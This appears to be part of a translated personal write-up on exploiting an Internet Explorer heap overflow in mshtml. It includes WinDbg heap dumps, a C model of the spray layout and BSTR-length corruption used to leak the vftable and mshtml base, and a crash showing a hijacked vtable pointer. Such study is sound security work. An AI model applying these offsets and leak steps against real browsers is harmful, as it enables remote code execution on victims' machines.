03f2b270 00 00 00 00 00 00 00 00-66 10 d1 01 00 00 00 c2 ........f.......
03f2b280 a4 30 a9 03 00 00 00 00-02 00 00 00 1c 00 02 05 .0..............
03f2b290 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2b2a0 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H.......
03f2b2b0 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E.
03f2b2c0 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H...........
03f2b2d0 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E.
03f2b2e0 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2b2f0 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H...
03f2b300 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2b310 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H.......
03f2b320 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E.
03f2b330 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H...........
03f2b340 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E.
03f2b350 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2b360 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H...
03f2b370 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2b380 45 00 45 00 41 00 45 00-48 00 01 00 45 00 00 00 E.E.A.E.H...E...
03f2b390 5b 10 d1 01 00 00 00 c2-0c 61 81 04 00 00 00 00 [........a......
03f2b3a0 02 00 00 00 18 00 02 05-fa 00 00 00 41 00 41 00 ............A.A.
03f2b3b0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b3c0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b3d0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b3e0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b3f0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b400 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b410 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b420 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b430 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b440 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b450 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b460 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b470 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b480 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b490 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b4a0 41 00 41 00 41 00 00 00-bc 10 d1 01 00 00 00 c2 A.A.A...........
03f2b4b0 0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05 .a..............
03f2b4c0 fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00 ....B.B.B.B.B.B.
03f2b4d0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b4e0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b4f0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b500 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b510 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b520 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b530 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b540 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b550 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b560 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b570 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b580 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b590 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b5a0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b5b0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 00 00 B.B.B.B.B.B.B...
03f2b5c0 91 10 d1 01 00 00 00 c2-c0 6a 81 04 00 00 00 00 .........j......
03f2b5d0 02 00 00 00 1c 00 02 05-f8 3a 8d 68 10 0b 37 01 .........:.h..7.
03f2b5e0 e0 90 ef 03 90 3c 8d 68-01 00 00 00 00 00 00 00 .....<.h........
03f2b5f0 09 08 08 01 ff ff ff ff-00 00 00 00 00 00 00 00 ................
03f2b600 00 00 00 00 ff ff ff ff-80 00 00 00 ff ff ff ff ................
03f2b610 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b620 00 00 00 00 24 00 00 00-20 00 00 00 00 00 00 00 ....$... .......
03f2b630 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b640 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b650 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b660 00 00 00 00 00 00 00 00-00 00 00 00 88 b6 f2 03 ................
03f2b670 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b680 01 00 00 00 01 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b690 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b6a0 ff ff ff ff ff ff ff ff-ff ff ff ff ff ff ff ff ................
03f2b6b0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b6c0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b6d0 00 00 00 00 00 00 00 00-f2 10 d1 01 00 00 00 c2 ................
03f2b6e0 a4 30 a9 03 00 00 00 00-02 00 00 00 1c 00 02 05 .0..............
03f2b6f0 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2b700 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H.......
03f2b710 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E.
03f2b720 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H...........
03f2b730 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E.
03f2b740 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2b750 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H...
03f2b760 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2b770 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H.......
03f2b780 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E.
03f2b790 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H...........
03f2b7a0 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E.
03f2b7b0 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2b7c0 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H...
03f2b7d0 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2b7e0 45 00 45 00 41 00 45 00-48 00 01 00 45 00 00 00 E.E.A.E.H...E...
03f2b7f0 d7 10 d1 01 00 00 00 c2-0c 61 81 04 00 00 00 00 .........a......
03f2b800 02 00 00 00 18 00 02 05-fa 00 00 00 41 00 41 00 ............A.A.
03f2b810 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b820 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b830 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b840 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b850 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b860 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b870 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b880 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b890 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b8a0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b8b0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b8c0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b8d0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b8e0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b8f0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2b900 41 00 41 00 41 00 00 00-08 11 d1 01 00 00 00 c2 A.A.A...........
03f2b910 0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05 .a..............
03f2b920 fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00 ....B.B.B.B.B.B.
03f2b930 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b940 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b950 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b960 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b970 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b980 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b990 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b9a0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b9b0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b9c0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b9d0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b9e0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b9f0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2ba00 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2ba10 42 00 42 00 42 00 42 00-42 00 42 00 42 00 00 00 B.B.B.B.B.B.B...
03f2ba20 6d 11 d1 01 00 00 00 c2-c0 6a 81 04 00 00 00 00 m........j......
03f2ba30 02 00 00 00 1c 00 02 05-f8 3a 8d 68 10 0b 37 01 .........:.h..7.
03f2ba40 50 91 ef 03 90 3c 8d 68-01 00 00 00 00 00 00 00 P....<.h........
03f2ba50 09 08 08 01 ff ff ff ff-00 00 00 00 00 00 00 00 ................
03f2ba60 00 00 00 00 ff ff ff ff-80 00 00 00 ff ff ff ff ................
03f2ba70 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2ba80 00 00 00 00 24 00 00 00-20 00 00 00 00 00 00 00 ....$... .......
03f2ba90 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2baa0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2bab0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2bac0 00 00 00 00 00 00 00 00-00 00 00 00 e8 ba f2 03 ................
03f2bad0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2bae0 01 00 00 00 01 00 00 00-00 00 00 00 00 00 00 00 ................
03f2baf0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2bb00 ff ff ff ff ff ff ff ff-ff ff ff ff ff ff ff ff ................
03f2bb10 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2bb20 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2bb30 00 00 00 00 00 00 00 00-4e 11 d1 01 00 00 00 c2 ........N.......
03f2bb40 a4 30 a9 03 00 00 00 00-02 00 00 00 1c 00 02 05 .0..............
03f2bb50 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2bb60 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H.......
03f2bb70 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E.
03f2bb80 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H...........
03f2bb90 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E.
03f2bba0 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2bbb0 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H...
03f2bbc0 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2bbd0 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H.......
03f2bbe0 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E.
03f2bbf0 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H...........
03f2bc00 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E.
03f2bc10 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2bc20 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H...
03f2bc30 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2bc40 45 00 45 00 41 00 45 00-48 00 01 00 45 00 00 00 E.E.A.E.H...E...
03f2bc50 a3 11 d1 01 00 00 00 c2-0c 61 81 04 00 00 00 00 .........a......
03f2bc60 02 00 00 00 18 00 02 05-fa 00 00 00 41 00 41 00 ............A.A.
03f2bc70 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bc80 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bc90 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bca0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bcb0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bcc0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bcd0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bce0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bcf0 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bd00 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bd10 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bd20 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bd30 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bd40 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bd50 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00 A.A.A.A.A.A.A.A.
03f2bd60 41 00 41 00 41 00 00 00-84 11 d1 01 00 00 00 c2 A.A.A...........
03f2bd70 0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05 .a..............
03f2bd80 fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00 ....B.B.B.B.B.B.
03f2bd90 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2bda0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2bdb0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2bdc0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2bdd0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2bde0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2bdf0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2be00 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2be10 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2be20 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2be30 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2be40 42 00 42 00 42 00 42 00-42 00 42 00 B.B.B.B.B.B.

It is easy to see that the AAAA string from 03f2ae30 on has been overwritten in bulk, so this is vulheap.
For comparison I dumped much more; the AAAA strings further down that were not overwritten appear in contiguous runs.

Comparing with 漏洞战争, the fa at 03f2b040 should have been overwritten with 48 00 01 00, i.e. 0x00010048, and that overwrite is visible (blue box in the figure below).
By 0x03f2ae30 + 0x100 (EEEE...) + 0x8 (heap header) + 0x100 (AAAA...) + 0x8 (heap header) = 03f2b040, it should indeed be there, so I don't think I misunderstood.

But strangely my fa is still there (red box in the figure below). That is probably why the vtable address my alert printed earlier was wrong; it does not seem to happen in other people's write-ups, and I can't explain it.

Once the vtable address is obtained, compute the mshtml base address and build the ROP chain.
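The layout from the spray and the information leak as an added C model; this is my illustration, not the exploit's code and not code from the page or the book. The chunk spacing, the record field positions and the vftable value are taken from the dump above: the chunks there lie 0x118 apart (B's length field 0xfa at 03f2b060, the CButtonLayout at 03f2b178 whose first dword 0x688d3af8 is mshtml+0x173af8, giving a base of 0x68760000, and whose third dword 0x688d3c90 is the second vftable at +0x173c90 from the x output), each 0x1c-byte record carries width*100 at +0, +4, +8 and 0x00010048 at +0x18 with the other three dwords untouched, and the spray strings are 0x100-byte BSTRs. The `hdr` parameter (bytes of metadata between chunk payloads), the names, and the flat 4 KB model of the heap are assumptions; 0x18 reproduces the dump's spacing, 8 is the plain 8-byte _HEAP_ENTRY of an undebugged 32-bit process.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define REC_SIZE    0x1c      /* CTableColCalc stride */
#define BSTR_ALLOC  0x100     /* 4-byte length + 125 wide chars + terminator (the spray's (0x100-6)/2) */
#define BSTR_LEN    0xfa      /* byte length the sprayed strings start with */
#define VFTABLE_OFF 0x173af8  /* CButtonLayout::`vftable' minus mshtml base, from the x output above */
#define MEM_SIZE    0x1000

typedef struct {
    uint8_t  mem[MEM_SIZE];   /* flat model of the heap; vulheap starts at offset 0 */
    uint32_t a_len;           /* offset of the A string's BSTR length field */
    uint32_t b_len;           /* offset of the B string's BSTR length field */
    uint32_t obj;             /* offset of the CButtonLayout (vftable pointer at +0) */
} layout_t;

static void put32(layout_t *l, uint32_t off, uint32_t v) { memcpy(l->mem + off, &v, 4); }
static uint32_t get32(const layout_t *l, uint32_t off) { uint32_t v; memcpy(&v, l->mem + off, 4); return v; }

/* [vulheap][hdr][A][hdr][B][hdr][CButtonLayout]. The vftable slot is seeded
   with the value the dump shows at 03f2b178. */
static void build_layout(layout_t *l, uint32_t hdr, uint32_t vftable)
{
    memset(l->mem, 0, sizeof l->mem);
    l->a_len = BSTR_ALLOC + hdr;
    l->b_len = l->a_len + BSTR_ALLOC + hdr;
    l->obj   = l->b_len + BSTR_ALLOC + hdr;
    put32(l, l->a_len, BSTR_LEN);
    put32(l, l->b_len, BSTR_LEN);
    for (uint32_t i = 0; i < BSTR_LEN; i += 2) {      /* wide 'A' / 'B' characters */
        l->mem[l->a_len + 4 + i] = 'A';
        l->mem[l->b_len + 4 + i] = 'B';
    }
    put32(l, l->obj, vftable);
}

/* The overflow: span records of 0x1c bytes from vulheap, with the field
   positions observed in the dump; three dwords per record are left untouched. */
static void overflow(layout_t *l, int span, int width)
{
    uint32_t px = (uint32_t)width * 100;
    for (int k = 0; k < span && (uint32_t)(k + 1) * REC_SIZE <= MEM_SIZE; k++) {
        uint32_t rec = (uint32_t)k * REC_SIZE;
        put32(l, rec + 0x00, px);
        put32(l, rec + 0x04, px);
        put32(l, rec + 0x08, px);
        put32(l, rec + 0x18, 0x00010048);
    }
}

/* What jscript's charCodeAt sees: a read bounded by the (now corrupted) length. */
static int bstr_char_at(const layout_t *l, uint32_t len_off, uint32_t idx)
{
    uint32_t off = len_off + 4 + idx * 2;
    if (idx >= get32(l, len_off) / 2 || off + 2 > MEM_SIZE)
        return -1;
    return l->mem[off] | (l->mem[off + 1] << 8);
}

/* Character index at which the vftable pointer sits when read through A. */
uint32_t vftable_char_index(const layout_t *l)
{
    return (l->obj - (l->a_len + 4)) / 2;
}

/* Read the vftable pointer through A and derive the mshtml base;
   returns 0 when the corrupted length does not reach the object. */
uint32_t leak_mshtml_base(const layout_t *l)
{
    uint32_t i = vftable_char_index(l);
    int lo = bstr_char_at(l, l->a_len, i), hi = bstr_char_at(l, l->a_len, i + 1);
    if (lo < 0 || hi < 0)
        return 0;
    return (((uint32_t)hi << 16) | (uint32_t)lo) - VFTABLE_OFF;
}

/* Replay span=19, width=41 (the modified exp above) on a given spacing. */
uint32_t a_length_after(uint32_t hdr, int span)
{
    layout_t l;
    build_layout(&l, hdr, 0x688d3af8);
    overflow(&l, span, 41);
    return get32(&l, l.a_len);
}

uint32_t base_after(uint32_t hdr, int span)
{
    layout_t l;
    build_layout(&l, hdr, 0x688d3af8);
    overflow(&l, span, 41);
    return leak_mshtml_base(&l);
}

int main(void)
{
    printf("hdr=0x18: A length 0x%x, base 0x%08x\n", a_length_after(0x18, 19), base_after(0x18, 19));
    printf("hdr=0x08: A length 0x%x, base 0x%08x\n", a_length_after(8, 19), base_after(8, 19));
    return 0;
}
```

With the dump's spacing (hdr=0x18) A's length field sits at vulheap+0x118, which is exactly the start of record 10, so it becomes 0x1004 (the 04 10 00 00 the dump shows at 03f2af48); with 19 records the writes stop at +0x214, short of B's length field at +0x230, and the vftable is then readable at character index 278 of A, giving 0x688d3af8 - 0x173af8 = 0x68760000. With an 8-byte header the length field falls on one of the untouched dwords of record 9, the string keeps its 0xfa length, and the read of the object is refused: which dword of the record lands on the length field is entirely a matter of spacing, which is why any change to the heap (page heap, debug heap, a different IE build) has to be accounted for before the leak index is computed.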

Then overflow once more. This time, just like the BBBB overwrite above, the overflow reaches the vtable pointer directly, so the vtable pointer can be hijacked to an arbitrary address, as shown below.

(6cc.7f8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=07070024 ---> the controlled vtable pointer ebx=01000000 ecx=040f8910 edx=00000041 esi=0375f530 edi=040e0790
eip=003d006b esp=0375f368 ebp=0375f3a0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
003d006b 777a ja 003d00e7 [br=1]

Summary

Debugging the PoC went fairly smoothly; debugging the exp got stuck in all sorts of places.
Mostly I learned some windbg usage.
For example, to break at a chosen point in the page, insert a math function call such as Math.cos into the HTML and set a breakpoint on jscript!Cos.
To look at jscript's symbols, use x jscript!* in windbg; vtables can be located the same way (see above).